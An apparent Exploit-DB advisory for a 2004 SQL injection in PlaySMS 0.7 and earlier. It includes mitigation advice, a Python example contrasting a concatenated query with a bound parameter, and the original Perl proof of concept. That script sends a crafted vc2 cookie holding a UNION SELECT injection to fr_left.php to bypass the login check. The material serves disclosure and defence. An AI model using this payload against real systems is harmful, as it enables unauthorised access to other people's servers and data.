Vendor: PlaySMS
By: Noam Rathaus of Beyond Security Ltd.
CVSS: 7.5 (HIGH)
CWE: 89 (SQL Injection)
Product Name: PlaySMS
Affected Version From: 0.7 and prior
Affected Version To: 0.7
Patch Exists: NO
Platforms Tested: Linux
Year: 2004

PlaySMS version 0.7 and prior SQL Injection PoC

This is a proof-of-concept script demonstrating a SQL injection vulnerability in PlaySMS version 0.7 and prior. The script requests fr_left.php with a crafted vc2 cookie. The vulnerability allows an attacker to inject SQL into the application's queries, potentially leading to unauthorized access or manipulation of the database.

Mitigation:

Upgrade to a newer version of PlaySMS that includes a fix for the SQL Injection vulnerability. Additionally, sanitize and validate user input to prevent SQL Injection attacks.
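
The mitigation above, as an added example that is not part of the original advisory or of PlaySMS: a Python/SQLite stand-in showing why the vc1/vc2 cookie pair from the PoC passes a check built by string concatenation and fails one that uses a bound parameter. The users table, its columns, the query shape and the function names are assumptions; the PlaySMS source is not shown on this page.

```python
import sqlite3
from urllib.parse import unquote

# Constructed stand-in schema; the real PlaySMS table and column names are not on this page.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT PRIMARY KEY, ticket TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 'k3f9-constructed-session')")
    return db

def parse_cookies(header):
    """Split a Cookie header into a dict of URL-decoded values."""
    pairs = (p.strip().split("=", 1) for p in header.split(";") if "=" in p)
    return {k: unquote(v) for k, v in pairs}

def valid_vulnerable(db, cookies):
    # Assumed pre-fix pattern: the cookie value is concatenated into the SQL text,
    # so a quote in vc2 changes the structure of the statement.
    sql = "SELECT ticket FROM users WHERE username='%s'" % cookies.get("vc2", "")
    row = db.execute(sql).fetchone()
    return row is not None and row[0] == cookies.get("vc1")

def valid_hardened(db, cookies):
    # Bound parameter: the cookie value is only ever compared as data, never parsed as SQL.
    row = db.execute("SELECT ticket FROM users WHERE username = ?",
                     (cookies.get("vc2", ""),)).fetchone()
    return row is not None and row[0] == cookies.get("vc1")

POC_COOKIE = "vc1=ticket; vc2='%20union%20select%20'ticket;"  # cookie header from the PoC on this page
GOOD_COOKIE = "vc1=k3f9-constructed-session; vc2=admin"       # constructed legitimate session

if __name__ == "__main__":
    db = make_db()
    for name, header in (("poc", POC_COOKIE), ("legit", GOOD_COOKIE)):
        c = parse_cookies(header)
        print(name, "vulnerable:", valid_vulnerable(db, c), "hardened:", valid_hardened(db, c))
```

With concatenation, the UNION supplies the value that is then compared against vc1, so the check succeeds without any matching row in the table; with the bound parameter the same cookie is just a username that does not exist.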

Exploit-DB raw data:

#!/usr/bin/perl
# PlaySMS version 0.7 and prior SQL Injection PoC
# Written by Noam Rathaus of Beyond Security Ltd.
#

use IO::Socket;
use strict;

# Target host is taken from the first command-line argument.
my $host = $ARGV[0];

my $remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host, PeerPort => "80" );

unless ($remote) { die "cannot connect to http daemon on $host" }

print "connected\n";

$remote->autoflush(1);

# The request carries the injection in the URL-encoded vc2 cookie.
my $http = "GET /~playsms/fr_left.php HTTP/1.1
Host: $host:80
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7) Gecko/20040712 Firefox/0.9.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Cookie: vc1=ticket; vc2='%20union%20select%20'ticket;
Content-Type: application/x-www-form-urlencoded
Connection: close

";

print "HTTP: [$http]\n";
print $remote $http;
sleep(1);
print "Sent\n";

# Print the server's response as it arrives.
while (<$remote>)
{
    print $_;
}
print "\n";

close $remote;

# milw0rm.com [2004-08-19]